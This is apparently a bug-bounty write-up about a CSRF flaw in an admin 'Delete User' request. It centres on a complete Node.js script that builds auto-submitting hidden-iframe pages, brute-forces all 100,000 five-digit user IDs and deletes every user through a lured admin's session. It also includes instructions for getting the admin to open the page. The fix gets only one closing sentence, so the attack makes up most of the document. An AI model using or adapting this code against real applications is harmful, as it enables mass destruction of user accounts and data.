Brute Forcing User IDs via CSRF to Delete All Users

While testing an application, I came across a "Delete User" module through which an admin can delete any user.

If you look at the request, there is no CSRF token or any other CSRF protection on the delete-user request.

This was a straightforward CSRF: an attacker can send a form to the admin and have the admin's browser delete a user from the application.

Simple CSRF PoC to Delete User

But notice that the request also contains the user ID. My challenge was to find out whether the application exposed user IDs at any endpoint, but I found no user ID leakage.

As the ID was a 5-digit number (at most 100,000 candidates), it was easy to brute force.

From some research I found a blog post in which an attacker brute forced IDs with the help of clickjacking.

  • The challenge now was that the application sent an X-Frame-Options header, so I could not load it into a frame to brute force the IDs.
  • I tried XMLHttpRequest, but the application validated the Origin, so in this case XHR did not work for me either.

Then I tried pointing the form submission at a hidden iframe as its target.

In this case I could not view the response, because it carried the X-Frame-Options header that the browser enforces, but I was still able to send the request: X-Frame-Options only stops the browser from rendering the response in the frame, and by the time it arrives the server has already processed the delete.

So I wrote a CSRF script that brute forces the user IDs and, from the admin's browser, deletes every existing user from the application.
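Putting the iframe-target trick and the ID loop together, here is an added example, not the original post's PoC (whose code is not shown): a small Node.js script that generates both the single-user CSRF page from the earlier PoC and the brute-force page described above. The endpoint https://target.example/admin/deleteUser, the form field name userId and the 5-digit range are assumptions for illustration only; substitute the real request.

```javascript
// Added example (not part of the original post): a Node.js generator for the
// two CSRF pages the write-up describes, a single-ID delete and a brute-force
// page that submits one delete-user form per candidate 5-digit ID into hidden
// iframes. Endpoint and field name are assumptions for illustration only:
// POST https://target.example/admin/deleteUser with a form field "userId".
// Usage: node csrf_poc.js > poc.html

// Escape a value before embedding it in an HTML attribute or text node.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// Zero-pad a number to the ID width (e.g. padId(7, 5) -> "00007").
// Its source is also embedded into the generated page via toString().
function padId(n, width) {
  var s = String(n);
  while (s.length < width) s = "0" + s;
  return s;
}

// Single-ID PoC: an auto-submitting POST form whose target is a hidden iframe.
// The submission is a navigation, not an XHR, so CORS does not apply to it.
// X-Frame-Options only stops the browser from rendering the response inside
// the iframe; by then the server has already handled the delete.
function buildSingleDeletePoC(action, field, userId) {
  return `<!doctype html>
<html><body>
<iframe name="sink" style="display:none"></iframe>
<form id="f" method="POST" action="${escapeHtml(action)}" target="sink">
  <input type="hidden" name="${escapeHtml(field)}" value="${escapeHtml(userId)}">
</form>
<script>document.getElementById("f").submit();</script>
</body></html>`;
}

// Brute-force PoC: every ID in [start, end] is submitted from the victim's
// browser. Each submission gets its own short-lived iframe as target, so a
// new navigation never aborts the previous one before its request is sent.
// No response is ever observable; the page simply fires every candidate.
function buildBruteForcePoC(action, field, start, end, width, delayMs) {
  if (![start, end, width, delayMs].every(Number.isInteger) || start > end) {
    throw new Error("invalid ID range or timing");
  }
  return `<!doctype html>
<html><body>
<form id="f" method="POST" action="${escapeHtml(action)}">
  <input id="uid" type="hidden" name="${escapeHtml(field)}" value="">
</form>
<script>
${padId.toString()}
(function () {
  var next = ${start}, end = ${end}, width = ${width}, delay = ${delayMs};
  var form = document.getElementById("f");
  var input = document.getElementById("uid");
  function fire() {
    if (next > end) return;
    var id = padId(next++, width);
    var frame = document.createElement("iframe");
    frame.name = "sink" + id;
    frame.style.display = "none";
    document.body.appendChild(frame);
    form.target = frame.name;
    input.value = id;
    form.submit();
    // Drop the iframe once the request has certainly left the browser.
    setTimeout(function () { frame.remove(); }, delay * 20);
    setTimeout(fire, delay);
  }
  fire();
})();
</script>
</body></html>`;
}

// Total number of requests the brute-force page will send.
function requestCount(start, end) {
  return end - start + 1;
}

// Emit the brute-force page for the whole zero-padded 5-digit space.
process.stdout.write(
  buildBruteForcePoC("https://target.example/admin/deleteUser", "userId", 0, 99999, 5, 50)
);
```

Host the generated page anywhere and get the admin to open it while logged in; every form post carries the admin's session cookie. With a 50 ms interval the full 5-digit space is 100,000 requests, roughly 83 minutes, so the victim has to keep the tab open; that is the price of blind, fire-and-forget submissions where the response is never readable. On the application side the fix is a per-session anti-CSRF token on the delete request (hiding or randomising IDs alone does not help).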

When I sent this PoC to the victim (an admin), I was able to delete all existing users from the application.

Thanks guys for reading. 
Have a great day ahead.